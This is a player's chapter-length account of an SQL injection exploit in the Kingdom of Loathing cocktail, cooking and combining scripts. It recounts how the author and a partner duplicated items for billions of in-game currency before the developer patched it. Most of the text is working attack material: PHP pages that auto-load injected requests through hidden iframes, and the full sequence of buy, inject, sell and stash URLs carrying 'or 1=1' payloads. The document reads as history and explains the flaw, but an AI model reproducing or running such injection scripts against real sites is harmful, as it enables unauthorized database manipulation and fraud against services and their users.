Author: Boozerbear
Chapter Ten
(Cocktailcrafting/Cooking/Combining)
One of the most profitable bugs found in the game (meat per click-wise) was the infamous Salty Dog Hack. Discovered when Pimonkey and I were discussing some interesting new buggies we'd been playing with and I mentioned that I found a vulnerability in the Cocktailcrafting script that allowed me to trade meat pastes for salty dogs. The problem with the exploit was that meatpastes took a lot of server hits to make in the quantity we needed, thus the exploit was just a moderate-potential meatcheat instead of being the "billion meat-per-click" exploit that we were searching for. It looked like this:
<?php
print <<<EOF
<html>
<head>
<title>KOL SaltyDog</title>
</head>
<body>
<b>KOL SaltyDog</b>
<form method="get" action="saltydog2.php" target="selah">
how many (this will be x10):
<input type="text" name="amount"><br>
pwd:
<input type="text" name="pwd"><br>
<input type="checkbox" name="repeat">repeat<br>
<input type="submit" name="submit" value="go!">
</form>
<br>
<iframe src="index.php?blank=1" width="620" height="500"
name="selah">
</iframe>
</body>
</html>
EOF;
?>
And then saltydog2.php:
<?php
$amount=(integer)$_GET[$amount];
$pwd=$_GET[$pwd];
$tenamt = $amount * 10;
if ($amount && $pwd) {
print <<<EOF
<html>
<head>
<title>KOL SaltyDog</title>
EOF;
if ($repeat > 0) {
print <<<EOF
<META HTTP-EQUIV="Pragma" CONTENT="no-cache">
<META HTTP-EQUIV="Expires" CONTENT="-1">
<meta content="2" http-equiv="REFRESH">
EOF;
}
print <<<EOF
</head>
<body>
<b>KOL SaltyDog</b>
<br>
<br>
Making $tenamt Pastes...
EOF;
for($z=1;$z<=$amount;$z++){
print <<<EOF
<iframe src="http://kingdomofloathing.com/inventory.php?which=3&action=10paste"
width="0" height="0" name="adv$z">
</iframe>
<br>
EOF;
} // end $z
print <<<EOF
<p>Making all the Salty Dogs we can...
<iframe src="http://kingdomofloathing.com/cocktail.php?action=combine&pwd=$pwd&item1=25
or 1=1&item2=25 or 1=1&makemax=1" width="600" height="100"
name="adv">
</iframe>
</body>
</html>
EOF;
} else {
print "data missing\n";
}
?>
It was Pimonkey who hit on the bright idea of using Gum on a String instead
of meatpastes, and since they could be bought in any quantity in the Demon Market
for about half the sell price of a Salty Dog, we were now looking at something
that would *double your meat* everytime you ran it. Needless to say, we got
extremely excited and both fired up our attack scripts. one minute we were millionares,
a few minutes later, billionares. in ten minutes we had stashed away almost
a hundred billion meat and a few million Salty Dogs left over. The process went
something like this:
buy 16777215 gums: (we hit a limit of 16777215 as the maximum amount of cocktailing
the script would accept, so we only bought that many gums.)
http://kingdomofloathing.com/store.php?phash=XXXX&whichstore=m&buying=Yep.&whichitem=23&howmany=16777215
turn gum into salty dogs:
http://kingdomofloathing.com/cocktail.php?action=combine&pwd=XXXX&item1=23
or 1=1&item2=23 or 1=1&makemax=1
sell salty dogs:
http://kingdomofloathing.com/inventory.php?which=1&action=sellall&whichitem=248&type=all
You gain 1090518975 Meat.
stash money in clan:
http://kingdomofloathing.com/clan_stash.php?action=contribute&howmuch=550000000
This is an SQL injection attack. Basically we're re-writing the MySQL query
to look something like this:
"SELECT cocktailID from cocktail_recipe_table WHERE item1=23 OR 1=1 AND
item2=23 OR 1=1"
instead of:
"SELECT cocktailID from cocktail_recipe_table WHERE item1=23 AND item2=23"
and since 1 always does equal 1, this query always returns success and the function
takes a single Gum On A String in exchange for the Salty Dog. Why a Salty Dog?
Well, I figure since the query didn't actually result in a returned cocktailID,
the script prolly just defaulted to the lowest-numbered mixed drink, the Salty
Dog (#248). Why did it only take 1 Gum On A String? I don't know, but probably
because $item1 and $item2 were the same itemID.
This same vulnerability existed in the cooking and combining scripts as well, can you guess what these scripts gave? (Cooking #162, Combining #31)
Since I was essentially racing against Pi and we were both racing against Jick (we'd both sent him a bug report), I didn't bother to script the process completely. I think both of us were just manually dumping meat into the clan stash after running the script. The whole thing lasted less than an hour before Jick came on and closed the hole.
<?php
print <<<EOF
<html>
<head>
<title>KOL Salty Dogger</title>
</head>
<body>
<b>KOL Salty Dogger</b>
<br>
<br>
sell salty dogs:
<br>
<iframe src="http://kingdomofloathing.com/inventory.php?which=1&action=sellall&whichitem=248&type=all"
width="600" height="170" name="adv3">
</iframe>
http://kingdomofloathing.com/inventory.php?which=1&action=sellall&whichitem=248&type=all
<br>
<br>
<!--
stash money in clan:
<br>
<iframe src="http://kingdomofloathing.com/clan_stash.php?action=contribute&howmuch=550000000"
width="600" height="170" name="adv4">
</iframe>
http://kingdomofloathing.com/clan_stash.php?action=contribute&howmuch=550000000
-->
buy 16777215 gums:
<br>
<iframe src="http://kingdomofloathing.com/store.php?phash=XXXX&whichstore=m&buying=Yep.&whichitem=23&howmany=16777215"
width="600" height="170" name="adv1">
</iframe>
http://kingdomofloathing.com/store.php?phash=XXXX&whichstore=m&buying=Yep.&whichitem=23&howmany=16777215
<br>
<br>
turn gum into salty dogs:
<br>
<iframe src="http://kingdomofloathing.com/cocktail.php?action=combine&pwd=XXXX&item1=23
or 1=1&item2=23 or 1=1&makemax=1" width="600" height="170"
name="adv2">
</iframe>
http://kingdomofloathing.com/cocktail.php?action=combine&pwd=XXXX&item1=23
or 1=1&item2=23 or 1=1&makemax=1
<br>
<br>
stash 550000000 in closet:
<br>
</body>
</html>
EOF;
?>